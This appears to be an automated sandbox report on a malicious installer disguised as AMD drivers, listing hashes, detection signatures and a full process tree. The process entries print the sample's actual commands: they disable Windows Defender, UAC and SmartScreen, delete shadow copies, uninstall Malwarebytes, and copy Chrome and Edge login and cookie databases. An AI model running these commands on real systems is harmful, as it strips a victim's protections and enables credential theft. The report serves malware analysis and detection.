Analysis
- max time kernel: 157s
- max time network: 150s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 29-11-2022 16:15
- Static task: static1
- Behavioral task: behavioral1
- Sample: AMD-drivers-2.0.7.exe
- Resource: win7-20220812-en

General
- Target: AMD-drivers-2.0.7.exe
- Size: 265.0MB
- MD5: 4d3bb85589bad628d92b79b17cf5e87e
- SHA1: 152d6b37b605255a3f7b71e416af6eed1682818a
- SHA256: ca15402e6141c7ae941aeed7ff80933c814bce7ca007fb237b7b61c93f3bb338
- SHA512: 67b4fc2dcb3aeb1b355d9c34b3e46948c868a27db07cce534dd5fb4b2c376206b10bd21be016755b1e20efd51f9b903b3b11cdcc963df23e5d4692a2f8e6f94c
- SSDEEP: 393216:GKVaRkwboTiwguCPAGlEt883Zr1KCAKmvumolJ5j:dabbO2/DEesmCAKmv4j5j
Malware Config

Signatures

Modifies Windows Defender notification settings
- Key created: \REGISTRY\MACHINE\software\microsoft\windows defender security center\notifications (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\windows defender security center\notifications (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\windows defender security center\notifications\disableenhancednotifications = "1" (reg.exe)

Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
- PID 2628 svchost.exe created 2232 r.exe
- PID 2628 svchost.exe created 1660 r.exe
- PID 2628 svchost.exe created 3836 r.exe
- PID 2628 svchost.exe created 4580 r.exe
- PID 2628 svchost.exe created 3056 r.exe
- PID 2628 svchost.exe created 2696 r.exe
- PID 2628 svchost.exe created 4492 r.exe
- PID 2628 svchost.exe created 3204 r.exe
- PID 2628 svchost.exe created 796 r.exe
- PID 2628 svchost.exe created 1068 r.exe

UAC bypass
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioruser = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" (reg.exe)

Windows security bypass
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCluSIoNS\pathS\C:\Windows\sySteM32\driVerS\eTc\hoStS = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCluSIoNS\eXteNSIoNs (reg.exe)
- Key created: \REGISTRY\MACHINE\SoftwAre\MICroSoFT\wINdowS deFender\exCLusioNs\extensIOnS (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCluSIoNS\eXteNSIoNs\cmd = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCluSIoNS\eXteNSIoNs\exe = "0" (reG.exe)
- Key created: \REGISTRY\MACHINE\Software\MicrOSOFT\WiNdows deFeNder\exclUSiOnS\eXteNSIOns (reG.exe)
- Key created: \REGISTRY\MACHINE\sOFTWAre\MiCroSoFT\wINdows deFeNder\eXClusIoNS\pathS (reg.exe)
- Key created: \REGISTRY\MACHINE\sOFtWAre\MicrosOFt\WIndOwS defeNder\exCluSIoNS\eXteNSIoNs (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCluSIoNS\eXteNSIoNs\dll = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\exCluSIoNS\eXteNSIoNs\scr = "0" (reg.exe)
- Key created: \REGISTRY\MACHINE\SOFTwAre\microSofT\WindoWS deFeNder\eXcLUSIonS\eXTeNSionS (reg.exe)

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.

Disables use of System Restore points 1 TTPs

Drops file in Drivers directory 1 IoCs
- File opened for modification: C:\Windows\system32\drivers\etc\hosts (cmd.exe)

Executes dropped EXE 23 IoCs
- AMD-drivers-2.0.7.tmp: PIDs 4548, 4964
- r.exe: PIDs 2232, 1660, 3836, 984, 4580, 3056, 4152, 2696, 4492, 928, 3204, 796, 4104, 1068, 1448
- obs64.exe: PIDs 3236, 4228
- obs64.tmp: PIDs 1140, 4212
- obs64.scr: PID 4268
- obs64.sCr: PID 2120

Possible privilege escalation attempt 5 IoCs
- takeown.exe: PID 4576
- icacls.exe: PIDs 4024, 4420, 996, 5104

Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
- Key value queried: \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation (one query each by AMD-drivers-2.0.7.tmp, WScript.exe, obs64.tmp, obs64.sCr)

Drops startup file 1 IoCs
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OBS.lnk (AMD-drivers-2.0.7.tmp)

Loads dropped DLL 2 IoCs
- rundll32.exe: PIDs 4740, 2084

Modifies file permissions 1 TTPs 5 IoCs
- takeown.exe: PID 4576
- icacls.exe: PIDs 4024, 4420, 996, 5104

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
- obs64.scr: PID 4268 (×2)

Suspicious use of SetThreadContext 1 IoCs
- PID 4268 obs64.scr set thread context of 2120 obs64.sCr

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
- vssadmin.exe: PID 4120

Kills process with taskkill 3 IoCs
- taskkill.exe: PIDs 3668, 3000, 1460

Modifies data under HKEY_USERS 25 IoCs
All by r.exe, under \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\:
- Key created: ZoneMap\ (×5)
- Set value (int): ZoneMap\ProxyBypass = "1" (×5)
- Set value (int): ZoneMap\UNCAsIntranet = "1" (×5)
- Set value (int): ZoneMap\IntranetName = "1" (×5)
- Set value (int): ZoneMap\AutoDetect = "0" (×5)

Suspicious behavior: EnumeratesProcesses 50 IoCs
- AMD-drivers-2.0.7.tmp: PID 4964 (×2)
- r.exe: PIDs 2232, 1660, 3836, 4580, 3056, 2696, 4492, 3204, 796, 1068 (×4 each)
- obs64.tmp: PID 4212 (×2)
- obs64.scr: PID 4268 (×2)
- powershell.exe: PIDs 864, 2112 (×2 each)

Suspicious use of AdjustPrivilegeToken 46 IoCs
- Token: SeDebugPrivilege: taskkill.exe PIDs 3000, 1460, 3668; powershell.exe PIDs 864, 2112; r.exe PIDs 2232, 1660, 3836, 4580, 3056, 2696, 4492, 3204, 796, 1068
- Token: SeAssignPrimaryTokenPrivilege: r.exe PIDs 2232, 1660, 3836, 4580, 3056, 2696, 4492, 3204, 796, 1068
- Token: SeIncreaseQuotaPrivilege: r.exe PIDs 2232, 1660, 3836, 4580, 3056, 2696, 4492, 3204, 796, 1068
- Token: 0: r.exe PIDs 2232, 3836, 3056, 4492, 796
- Token: SeTakeOwnershipPrivilege: takeown.exe PID 4576
- Token: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege: vssvc.exe PID 4092
- Token: SeTcbPrivilege: svchost.exe PID 2628 (×2)

Suspicious use of FindShellTrayWindow 2 IoCs
- AMD-drivers-2.0.7.tmp: PID 4964
- obs64.tmp: PID 4212

Suspicious use of SetWindowsHookEx 1 IoCs
- obs64.scr: PID 4268

Suspicious use of WriteProcessMemory 64 IoCs
- PID 2000 AMD-drivers-2.0.7.exe wrote to memory of 4548 AMD-drivers-2.0.7.tmp (×3)
- PID 4548 AMD-drivers-2.0.7.tmp wrote to memory of 4912 cmd.exe (×3)
- PID 4548 AMD-drivers-2.0.7.tmp wrote to memory of 5068 AMD-drivers-2.0.7.exe (×3)
- PID 4912 cmd.exe wrote to memory of 3000 taskkill.exe (×3)
- PID 5068 AMD-drivers-2.0.7.exe wrote to memory of 4964 AMD-drivers-2.0.7.tmp (×3)
- PID 4964 AMD-drivers-2.0.7.tmp wrote to memory of 4740 rundll32.exe (×3)
- PID 4740 rundll32.exe wrote to memory of 2084 rundll32.exe (×2)
- PID 3088 WScript.exe wrote to memory of 3572 cmd.exe (×2)
- PID 3572 cmd.exe wrote to memory of each of the following (×2 each): 604 reg.exe, 1824 reg.exe, 5004 reg.exe, 664 reg.exe, 2124 reg.exe, 380 reg.exe, 4532 reg.exe, 4576 takeown.exe, 4024 icacls.exe, 1460 taskkill.exe, 4420 icacls.exe, 4076 reg.exe, 1416 reg.exe, 2832 reg.exe, 2536 reg.exe, 1584 reg.exe, 1844 reg.exe, 1700 reg.exe, 3764 reg.exe, 3472 reg.exe, 4232 reg.exe
Processes
Each entry gives the image path, then (indented beneath it) the command line and the signatures that process triggered; entries are indented by their depth in the process tree.

C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe
  "C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe"
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\is-MF3GV.tmp\AMD-drivers-2.0.7.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-MF3GV.tmp\AMD-drivers-2.0.7.tmp" /SL5="$200FE,13524617,160256,C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe"
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /f /im obs64.scr
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im obs64.scr
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken

    C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe
      "C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe" /verysilent /sp-
      - Suspicious use of WriteProcessMemory

      C:\Users\Admin\AppData\Local\Temp\is-VDUVT.tmp\AMD-drivers-2.0.7.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-VDUVT.tmp\AMD-drivers-2.0.7.tmp" /SL5="$F01D6,13524617,160256,C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe" /verysilent /sp-
        - Executes dropped EXE
        - Drops startup file
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\rundll32.exe
          "C:\Windows\system32\rundll32" C:\tmp\obs32.dll, Uaby
          - Loads dropped DLL
          - Suspicious use of WriteProcessMemory

          C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32" C:\tmp\obs32.dll, Uaby
            - Loads dropped DLL

        C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\.cmd""

          C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe
            r.eXe /SW:0 reg.exe add "hklm\sOFtWAre\MicrosOFt\WIndOwS defeNder\exCluSIoNS\eXteNSIoNs" /v dll /T reg_dWord /d 0 /f
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

            C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe
              "C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /SW:0 reg.exe add "hklm\sOFtWAre\MicrosOFt\WIndOwS defeNder\exCluSIoNS\eXteNSIoNs" /v dll /T reg_dWord /d 0 /f
              - Executes dropped EXE
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken

              C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe
                "C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /TI/ /SW:0 reg.exe add "hklm\sOFtWAre\MicrosOFt\WIndOwS defeNder\exCluSIoNS\eXteNSIoNs" /v dll /T reg_dWord /d 0 /f
                - Executes dropped EXE
                - Modifies data under HKEY_USERS

                C:\Windows\system32\reg.exe
                  "C:\Windows\system32\reg.exe" add "hklm\sOFtWAre\MicrosOFt\WIndOwS defeNder\exCluSIoNS\eXteNSIoNs" /v dll /T reg_dWord /d 0 /f
                  - Windows security bypass

          C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe
            r.eXe /sW:0 reg.exe Add "hKLM\SoftwAre\MICroSoFT\wINdowS deFender\exCLusioNs\extensIOnS" /v scr /t reg_dwOrd /d 0 /F
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

            C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe
              "C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /sW:0 reg.exe Add "hKLM\SoftwAre\MICroSoFT\wINdowS deFender\exCLusioNs\extensIOnS" /v scr /t reg_dwOrd /d 0 /F
              - Executes dropped EXE
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken

              C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe
                "C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /TI/ /sW:0 reg.exe Add "hKLM\SoftwAre\MICroSoFT\wINdowS deFender\exCLusioNs\extensIOnS" /v scr /t reg_dwOrd /d 0 /F
                - Executes dropped EXE
                - Modifies data under HKEY_USERS

                C:\Windows\system32\reg.exe
                  "C:\Windows\system32\reg.exe" Add "hKLM\SoftwAre\MICroSoFT\wINdowS deFender\exCLusioNs\extensIOnS" /v scr /t reg_dwOrd /d 0 /F
                  - Windows security bypass

          C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe
            r.eXe /Sw:0 reg.exe Add "hKlm\SOFTwAre\microSofT\WindoWS deFeNder\eXcLUSIonS\eXTeNSionS" /V cmd /t reG_dwOrd /d 0 /F
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

            C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe
              "C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /Sw:0 reg.exe Add "hKlm\SOFTwAre\microSofT\WindoWS deFeNder\eXcLUSIonS\eXTeNSionS" /V cmd /t reG_dwOrd /d 0 /F
              - Executes dropped EXE
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken

              C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe
                "C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /TI/ /Sw:0 reg.exe Add "hKlm\SOFTwAre\microSofT\WindoWS deFeNder\eXcLUSIonS\eXTeNSionS" /V cmd /t reG_dwOrd /d 0 /F
                - Executes dropped EXE
                - Modifies data under HKEY_USERS

                C:\Windows\system32\reg.exe
                  "C:\Windows\system32\reg.exe" Add "hKlm\SOFTwAre\microSofT\WindoWS deFeNder\eXcLUSIonS\eXTeNSionS" /V cmd /t reG_dwOrd /d 0 /F
                  - Windows security bypass

          C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe
            r.exe /sW:0 reG.exe Add "hKlm\Software\MicrOSOFT\WiNdows deFeNder\exclUSiOnS\eXteNSIOns" /V exe /t reg_dWord /d 0 /f
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

            C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe
              "C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /sW:0 reG.exe Add "hKlm\Software\MicrOSOFT\WiNdows deFeNder\exclUSiOnS\eXteNSIOns" /V exe /t reg_dWord /d 0 /f
              - Executes dropped EXE
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken

              C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe
                "C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /TI/ /sW:0 reG.exe Add "hKlm\Software\MicrOSOFT\WiNdows deFeNder\exclUSiOnS\eXteNSIOns" /V exe /t reg_dWord /d 0 /f
                - Executes dropped EXE
                - Modifies data under HKEY_USERS

                C:\Windows\system32\reG.exe
                  "C:\Windows\system32\reG.exe" Add "hKlm\Software\MicrOSOFT\WiNdows deFeNder\exclUSiOnS\eXteNSIOns" /V exe /t reg_dWord /d 0 /f
                  - Windows security bypass

          C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe
            r.eXe /sw:0 reg.exe add "hklm\sOFTWAre\MiCroSoFT\wINdows deFeNder\eXClusIoNS\pathS" /V "C:\Windows\sySteM32\driVerS\eTc\hoStS" /t "reG_dwOrd" /d "0" /F
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

            C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe
              "C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /sw:0 reg.exe add "hklm\sOFTWAre\MiCroSoFT\wINdows deFeNder\eXClusIoNS\pathS" /V "C:\Windows\sySteM32\driVerS\eTc\hoStS" /t "reG_dwOrd" /d "0" /F
              - Executes dropped EXE
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken

              C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe
                "C:\Users\Admin\AppData\Local\Temp\is-9MGH5.tmp\temp\r.exe" /TI/ /sw:0 reg.exe add "hklm\sOFTWAre\MiCroSoFT\wINdows deFeNder\eXClusIoNS\pathS" /V "C:\Windows\sySteM32\driVerS\eTc\hoStS" /t "reG_dwOrd" /d "0" /F
                - Executes dropped EXE
                - Modifies data under HKEY_USERS

                C:\Windows\system32\reg.exe
                  "C:\Windows\system32\reg.exe" add "hklm\sOFTWAre\MiCroSoFT\wINdows deFeNder\eXClusIoNS\pathS" /V "C:\Windows\sySteM32\driVerS\eTc\hoStS" /t "reG_dwOrd" /d "0" /F
                  - Windows security bypass

        C:\tmp\obs64.exe
          "C:\tmp\obs64.exe"
          - Executes dropped EXE

          C:\Users\Admin\AppData\Local\Temp\is-VG8Q1.tmp\obs64.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-VG8Q1.tmp\obs64.tmp" /SL5="$80204,9334883,121344,C:\tmp\obs64.exe"
            - Executes dropped EXE
            - Checks computer location settings

            C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c taskkill /f /im obs64.scr

              C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im obs64.scr
                - Kills process with taskkill
                - Suspicious use of AdjustPrivilegeToken

            C:\tmp\obs64.exe
              "C:\tmp\obs64.exe" /verysilent /sp-
              - Executes dropped EXE

              C:\Users\Admin\AppData\Local\Temp\is-4FOIQ.tmp\obs64.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-4FOIQ.tmp\obs64.tmp" /SL5="$90204,9334883,121344,C:\tmp\obs64.exe" /verysilent /sp-
                - Executes dropped EXE
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of FindShellTrayWindow

                C:\tmp\obs64.scr
                  "C:\tmp\obs64.scr"
                  - Executes dropped EXE
                  - Suspicious use of NtSetInformationThreadHideFromDebugger
                  - Suspicious use of SetThreadContext
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of SetWindowsHookEx

                  C:\tmp\obs64.sCr
                    "C:\tmp\obs64.sCr"
                    - Executes dropped EXE
                    - Checks computer location settings

                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\ch4l67dvuf1l0tdi240657531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\fb6n81tyukot2240657531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\3rpqamqf0xymy1h240657625.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\yi3zl7f8gjuvn240657625.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\google\chrome\user data\default\Preferences\" \"C:\Users\Admin\AppData\Local\Temp\ab0cu2189gt240657906.tmp\" -Force"
                      - Suspicious behavior: EnumeratesProcesses
                      - Suspicious use of AdjustPrivilegeToken

                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\mz1sg9bmhkr240671875.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\xn8w0oix240671875.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\ogxsqz3ryg9u240671968.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\ffcvww8md240671968.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\microsoft\edge\user data\default\Preferences\" \"C:\Users\Admin\AppData\Local\Temp\mn8oqmnyis4r6w240672250.tmp\" -Force"
                      - Suspicious behavior: EnumeratesProcesses
                      - Suspicious use of AdjustPrivilegeToken

                C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\inst.cmd""

        C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\de.cmd""

C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\tmp\.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\TMP\.CMD" "
    - Drops file in Drivers directory
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\reg.exe
      reg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "consentpromptbehavioradmin" /t reg_dword /d "0" /f
      - UAC bypass

    C:\Windows\system32\reg.exe
      reg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "consentpromptbehavioruser" /t reg_dword /d "0" /f
      - UAC bypass

    C:\Windows\system32\reg.exe
      reg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "promptonsecuredesktop" /t reg_dword /d "0" /f
      - UAC bypass

    C:\Windows\system32\reg.exe
      reg add "hklm\software\policies\microsoft\windows defender\spynet" /v "submitsamplesconsent" /t reg_dword /d "2" /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\policies\microsoft\windows defender\spynet" /v "spynetreporting" /t reg_dword /d "0" /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\policies\microsoft\windows defender" /v "puaprotection" /t reg_dword /d "0" /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\policies\microsoft\windows defender\mpengine" /v "mpenablepus" /t reg_dword /d "0" /f

    C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\system32\smartscreen.exe" /a
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\icacls.exe
      icacls "C:\Windows\system32\smartscreen.exe" /reset
      - Possible privilege escalation attempt
      - Modifies file permissions

    C:\Windows\system32\taskkill.exe
      taskkill /im smartscreen.exe /f
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\icacls.exe
      icacls "C:\Windows\system32\smartscreen.exe" /inheritance:r /remove *s-1-5-32-544 *S-1-5-11 *s-1-5-32-545 *s-1-5-18
      - Possible privilege escalation attempt
      - Modifies file permissions

    C:\Windows\system32\reg.exe
      reg add "hklm\system\currentcontrolset\control\deviceguard\scenarios\hypervisorenforcedcodeintegrity" /v "enabled" /t reg_dword /d "1" /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\policies\microsoft\windows\system" /v "enablesmartscreen" /t reg_dword /d "0" /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\microsoft\windows\currentversion\explorer" /v "smartscreenenabled" /t reg_sz /d "off" /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\policies\microsoft\mrt" /v "dontofferthroughwuau" /t "reg_dword" /d "1" /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\policies\microsoft\mrt" /v "dontreportinfectioninformation" /t "reg_dword" /d "1" /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\policies\microsoft\windows defender\ux configuration" /v "notification_suppress" /t reg_dword /d "1" /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\policies\microsoft\windows defender\windows defender exploit guard\controlled folder access" /v "enablecontrolledfolderaccess" /t reg_dword /d "0" /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\policies\microsoft\windows defender\reporting" /v "disableenhancednotifications" /t reg_dword /d "1" /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\microsoft\windows defender security center\notifications" /v "disableenhancednotifications" /t reg_dword /d "1" /f
      - Modifies Windows Defender notification settings

    C:\Windows\system32\reg.exe
      reg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "filesblockednotificationdisabled" /t reg_dword /d "1" /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "noactionnotificationdisabled" /t reg_dword /d "1" /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "summarynotificationdisabled" /t reg_dword /d "1" /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\policies\microsoft\windows\explorer" /v "disablenotificationcenter" /t reg_dword /d "1" /f

    C:\Windows\system32\reg.exe
      reg add "hkcu\software\microsoft\windows\currentversion\pushnotifications" /v "toastenabled" /t reg_dword /d "0" /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\policies\microsoft\windows defender security center\virus and threat protection" /v uilockdown /t reg_dword /d 1 /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\policies\microsoft\windows defender security center\app and browser protection" /v uilockdown /t reg_dword /d 1 /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\policies\microsoft\windows nt\systemrestore" /v "disableconfig" /t reg_dword /d "1" /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\policies\microsoft\windows nt\systemrestore" /v "disablesr" /t reg_dword /d "1" /f

    C:\Windows\system32\reg.exe
      reg add "hkcu\software\microsoft\windows\currentversion\policies\attachments" /v "savezoneinformation" /t reg_dword /d "1" /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\microsoft\windows\currentversion\policies\attachments" /v "savezoneinformation" /t reg_dword /d "1" /f

    C:\Windows\system32\reg.exe
      reg add "hklm\software\microsoft\windows\currentversion\policies\attachments" /v "scanwithantivirus" /t reg_dword /d "1" /f

    C:\Windows\system32\icacls.exe
      icacls "C:\Users\Admin\AppData\Roaming\microsoft\windows\start menu\programs\startup" /remove:d "everyone" /t /c
      - Possible privilege escalation attempt
      - Modifies file permissions

    C:\Windows\system32\icacls.exe
      icacls "C:\Users\Admin\AppData\Roaming\microsoft\windows\start menu\programs\startup" /deny "everyone":(de,dc) /t /c
      - Possible privilege escalation attempt
      - Modifies file permissions

    C:\Windows\system32\schtasks.exe
      schtasks /create /xml "C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\ar.xml" /tn ar /f
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.execmd /c "C:\Program Files\malwarebytes\anti-malware\mbuns.exe" /uninstall /verysilent /f3⤵
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\find.exefind /c /i "checkappexec.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "safebrowsing.googleapis.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
C:\Windows\system32\find.exefind /c /i "ars.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"3⤵
-
